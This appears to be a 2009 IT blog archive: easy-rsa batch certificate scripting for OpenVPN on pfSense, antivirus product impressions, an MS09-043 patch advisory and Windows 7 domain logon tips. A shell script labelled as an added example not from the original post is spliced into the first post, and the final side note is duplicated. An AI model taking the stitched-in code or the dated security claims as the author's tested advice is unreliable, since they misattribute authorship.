openssl req -days 3650 -nodes -new -keyout $1.key -out $1.csr -config $KEY_CONFIG && \
openssl ca -days 3650 -out $1.crt -in $1.csr -config $KEY_CONFIG && \

We modify it to add -batch somewhere in each line, like below, and save the file

openssl req -days 3650 -nodes -new -keyout $1.key -out $1.csr -batch -config $KEY_CONFIG && \
openssl ca -days 3650 -out $1.crt -in $1.csr -batch -config $KEY_CONFIG && \

Now you’re ready to run in batch. But before that, load the vars into the environment like below, from /etc/openvpn/easyrsa

source vars

Run a sample like below

./build_batch test01

This will build test01.crt, test01.csr and test01.key automatically in /etc/openvpn/easyrsa/keys, with the commonName test01 as well :)

Done.
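With build_batch in place, the remaining chore is feeding it 300 store IDs. The added example below is not from the post; it is a small loop of my own that reads IDs from a text file (one per line, the same list you would keep in the spreadsheet) and calls build_batch for each, skipping IDs that already have a certificate so a re-run never overwrites an issued cert, and rejecting IDs that are unsafe as file names or commonNames. Assumptions not taken from the post: the list file, the $BUILD_CMD variable (default ./build_batch) and $KEY_DIR (easy-rsa exports it from vars; the default here is the post's keys directory).

```shell
#!/bin/sh
# Added example, not from the post: batch-issue one client cert per store ID.
# Run from /etc/openvpn/easyrsa after "source vars".
# Assumptions: $BUILD_CMD builds one name (default ./build_batch from the post),
# $KEY_DIR is where build-key writes <name>.crt (easy-rsa sets it in vars).

BUILD_CMD="${BUILD_CMD:-./build_batch}"
KEY_DIR="${KEY_DIR:-/etc/openvpn/easyrsa/keys}"

# valid_store_id ID -> 0 if ID is safe as a file name and commonName:
# non-empty, only [A-Za-z0-9_.-], and not starting with a dot
valid_store_id() {
    case "$1" in
        ''|*[!A-Za-z0-9_.-]*|.*) return 1 ;;
        *) return 0 ;;
    esac
}

# build_from_list FILE -> builds every ID listed in FILE; prints "built skipped failed"
build_from_list() {
    built=0; skipped=0; failed=0
    while IFS= read -r id || [ -n "$id" ]; do
        id=$(printf '%s' "$id" | tr -d '\r')        # tolerate CRLF lists exported from Excel
        case "$id" in ''|'#'*) continue ;; esac        # blank lines and comments
        if ! valid_store_id "$id"; then
            echo "skipping invalid id: $id" >&2
            failed=$((failed+1)); continue
        fi
        if [ -f "$KEY_DIR/$id.crt" ]; then
            skipped=$((skipped+1)); continue          # already issued: never overwrite
        fi
        if "$BUILD_CMD" "$id" >/dev/null 2>&1 && [ -s "$KEY_DIR/$id.crt" ]; then
            built=$((built+1))
        else
            failed=$((failed+1))
        fi
    done < "$1"
    echo "$built $skipped $failed"
}

# Usage:  build_from_list stores.txt
```

Checking that the .crt is non-empty after each build catches the case where openssl ca refused the request (for example a duplicate subject in the CA index), which with -batch would otherwise pass by silently in a long run.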

Now, if you want to do lots of these, use this Excel below

easy-rsa-linemaker.xls (Excel)

Use the Excel file (build-cert sheet) to generate script lines (see the sample in the sheet) so you can copy and paste them into an SSH session in the appropriate directory.

Copy up to 50 lines at a time (within the buffer) from the copypaster column and paste them via an SSH session while in /etc/openvpn/easyrsa; the certificates will be generated without any prompts. Quick and easy.

To remove/revoke certs, do the same but use the Excel’s revoke-cert sheet.


<Ignore CRL/STR_COPY issues, i don’t have CRLs defined>

If things get messed up badly, just run clean-all. Warning: this will remove your CA, server and DH information, which you will then need to repopulate inside pfSense.

./clean-all

After clean-all you must recreate all below

./build-ca
./build-key-server
./build-dh

Then re-run the steps above.

Monday, August 24, 2009

Microsoft Security Essentials 1.0 BETA vs. Kaspersky 2010

My colleague Henry asked me to scan his USB stick; he suspected a virus was lurking in there. I have both Kaspersky and MSE running in real time.

MSE detects and Kaspersky snoozed!

It was Win32/Vorus.CV


And MSE cleans it. I am confident in this product. Since it’s going to be free, I am a full supporter and advocate of MSE. Use it, try it, and have a trouble-free computing environment.

PS> Want a copy of MSE? I can give it to you, but you have to write to me with your email address.

Saturday, August 22, 2009

Immunet - Antivirus Cloud Computing


Immunet, a startup by Symantec senior execs, takes antivirus to the cloud. Immunet aggregates the results and "opinions" about threats from the people using the service. This means that if Bob gets an infection from Saudi Arabia, Immunet, alongside your antivirus, updates everyone in the Immunet community about the threat in real time so they are protected from it.
They also plan to protect social networking and other communities (probably Twitter, etc.).

Interesting concept. Could Computing Antivirus.

In summary, this is like every single immunet user would then be a possible contributor to protect all other immunet users in realtime.

Checkout their narrative:
Immunet Protect is free, light weight, cloud based Anti-Virus software which uses new approaches to provide malware protection. It is designed to work alongside Symantec, AVG and Mcafee to provide significantly improved detection rates in those products. You can also install it alone. Immunet works by providing its own fast and light layer of cloud based virus detection on top of your existing Anti-Virus product. Once you have Immunet installed it ties you into the Immunet Cloud and allows you to build communities of friends and family. When Immunet Protect detects a threat on your system it automatically makes available protections for it to everyone in your community and to the global community protecting them instantly.

Checkout and download. It doesn’t work on my Windows 7 X64 RTM tho :(. So i had to put it on my XP32 running AVG. Perfect!

Currently, this product works better with those three AV products. I am using Kaspersky + Microsoft Security Essentials Beta, so probably i wont benefit much but probably some security information when a bug/security threat is detected on Windows. (not sure..shall try).

Requirements

Microsoft Windows XP with Service Pack 2 or later
  • 300MHz or faster processor
  • 256MB of RAM
  • 10 MB of available hard disk space
Microsoft Windows Vista Home Basic/Home Premium
  • Supports 32-bit platforms only at this time
  • Must meet the minimum Windows Vista operating system requirements
Windows 7 (RC)
  • Supports 32-bit platforms only at this time
  • Must meet the minimum Windows 7 (RC) operating system requirements
Required for all installations:
  • A working Internet connection

http://www.immunet.com

Note: this product is a pre-release, i.e. a beta, so use it with discretion.

The main screen shows the number of people online and the threats it can clean. Not bad.

INTERESTING. About 20 minutes into writing this, the protection count increased by 2!!! SUPER COOL. There were no updates or downloads of threat patterns. Real time, hell yeah!

If I click the threat meter, nsDialogs.dll is apparently "safe". Then there are settings and such.

To participate, you need to register. Without registering you won't be able to "help" others :)

Click Register and create a new account at www.immunet.com, then sign in straight away and you should see your community view.

Join the cloud? Let us know your experiences.

Thursday, August 13, 2009

My views on free VS. premiere security products.. and Microsoft’s Antivirus?

It's interesting how one AV product suppresses another in just a matter of months. Look at the graphs produced by those so-called independent testers (a sample here). It's a big war between AV companies out there.

My problem is, it's sickening to know that we as consumers are always confused by all their gimmicks about free vs. premium/paid editions. You cannot do that with security products! <period>. Give it 100% or don't give it at all.

My take on it is, if you want to give something for free, give it 100% (and the world shall love you for it). Tearing down features for free vs. full versions is like saying "you get the car for free but the brakes only work 50%. So be careful. If you want full braking then you need to pay". This is their message, as I see it. This is also why the open source world keeps propelling forward and gaining mileage. They fall under the GPL, which does not allow licenses to be sold, so how do they profit? Professional support and services...

Know this... I am not talking about features; that's different. Maybe your security product performs system-wide application updates; now, that's a feature. Security, such as filtering through different protocols, email filtering or web filtering for example, shouldn't be a "paid" feature; it should just be a standard one.

Anyway, Microsoft will also soon be in the chase, prime time. It's called MS Security Essentials, dubbed Morro, a new free AV for PCs (they have already stopped beta test downloads, so it's getting ready for RC).

Combined with Security Center, Windows Update and the Windows Firewall, it's almost a full desktop security suite. However, it has yet to face the real-world challenge; this is a fact. So wait till it releases and we shall all see. (Word to note: HOME PC...) So, not sure where this is going for corporations yet.

From a commercial point of view this service will seriously dent the rest of the commercial AV market, no doubt, but again, I would rather get an AV that is 100% free than one of those "free but we won't give you 100% brakes" ones... This is good for consumers; the competition will ease our pockets for sure.

I bet there will be certain camps that will say it's from Microsoft, we can't trust it, bla bla. Just so you know, MS products are seriously "tested" (i.e. smothered and smacked) by millions of testers worldwide as soon as they see daylight, every second, even as I am writing this. This is why you get lots of "bugs/problems" reported, so effectively, for me as a security paranoiac, I would rather have those bugs exposed and fixed than have/use a product that no one knows is a big-ass Swiss cheese or not. I don't really care about the games the corporations play; I just want good quality software.

Wednesday, August 12, 2009

Possible new breed of mass-spreading worms? New vulnerabilities found in MS products.

Microsoft Office OWC10.Spreadsheet ActiveX BorderAround() Heap Corruption Vulnerability

The specific vulnerability exists in the OWC10.Spreadsheet.10 ActiveX control installed by Microsoft Office. By accessing specific methods in a certain order heap corruption occurs leading to remote code execution. If exploited, complete control of the affected system can be achieved under the rights of the currently logged in user.

[http://www.securityfocus.com/archive/1/505679]

This looks like a perfect candidate for a mass-spreading worm: a newly discovered (and now patched) vulnerability in Microsoft Office Web Components. Affected products, per the bulletin:

  • Office XP, Office XP Web Components, and Office 2000 Web Components (all editions)
  • Office 2003, Office 2003 Web Components, and Office 2003 Web Components for the 2007 Microsoft Office system (all editions)
  • Internet Security and Acceleration Server 2004 and Internet Security and Acceleration Server 2006 (all editions)
  • Microsoft BizTalk Server (all editions)
  • Visual Studio .NET 2003 (all editions)
  • Microsoft Office Small Business Accounting 2006 (all editions)

If you run ISA Server in particular, this is seriously critical. Get patched, get secure.

Since the exploit runs with the rights of the logged-on user, the damage is bounded by that account: on Vista and later, UAC keeps even an administrator's browser running with a filtered, non-elevated token until elevation is approved, so it may well block the privileged actions a remote exploit attempts, and browsing as a standard user limits the damage further.

Patch immediately or stand a chance of becoming part of the statistics (hopefully not).

http://www.microsoft.com/technet/security/bulletin/MS09-043.mspx

Monday, August 10, 2009

Logging on to Windows 2008 domain as an administrator on Windows 7 domain computer

This has probably been blogged a thousand times, but let me be the 1001st blogger ;).

Thought I’d share this from Windows 7 perspective instead.

So, here’s the rundown:

  • I got W2008 R2 and Windows 7 RTM up and running, joined the domain and such.

Ok, so the thing is, when you use the logon UI in Vista/Windows 7, it does "see" the domain it just joined and sets it up for you as your default domain (there is no longer a pull-down domain list).


Notice the part where it says "Log on to: BEAUTISEC"? BEAUTISEC is my domain, so you can skip the BEAUTISEC\username way of logging on and just type the username. If you want to log on to a domain other than BEAUTISEC, do this...

So, let's say I've got a domain called MSFT; I would need to type MSFT\user and log on that way. But since I am in my primary domain, i.e. BEAUTISEC, I don't have to; I just log on.

I log on as user sanjay and my password just works. But when I log on as administrator, it doesn't. Here's why:

For administrator accounts

In the above scenario, local administrator logons take precedence unless you put the domain before the logon name, like BEAUTISEC\administrator, which is your domain administrator account. Then you get to log on as the domain "administrator" account.

Here is what happens when I key in administrator (NOTE: the administrator here is the default built-in administrator account of that PC; it could be renamed admin or papasmurf and the effect is still the same):

The "Log on to" value is automatically set to BEAUTIFULPC, which is the local PC name, i.e. a local logon. This "feature" also lets anyone at the logon screen figure out the name of the local built-in admin account, renamed or not, before logging on, but yeah... moving on.

For regular accounts

Domain logons always take precedence unless you specify BEAUTIFULPC\<username> to log on to a local account, in other words any local account other than the built-in administrator (see my note above about the local admin account).

The "Log on to" value automatically changes to my domain, BEAUTISEC.

SIDE NOTE: On domain-joined Vista/Windows 7 machines you can't switch to the classic logon interface like on XP. But you can enable the "Interactive logon: Do not display last user name" policy through GPO (or gpedit.msc locally), or by setting the registry value DontDisplayLastUserName to 1 under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System. That lets you enter your username manually, but still no domain pull-down... like in the old days. ):
SIDE NOTE: You can’t change to classic logon interface for Vista/Windows 7 machines like how you see in XP for machines that are part of the domain. But you can enable the Interactive Logon: Do not display last username directive through registry or GPO (or GPEDIT locally). That shall let you enter your username manually but still no domain pulldowns… like in old days. ):